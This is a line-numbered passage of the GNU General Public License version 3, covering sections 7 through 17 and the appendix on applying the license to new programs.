the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | --------------------------------------------------------------------------------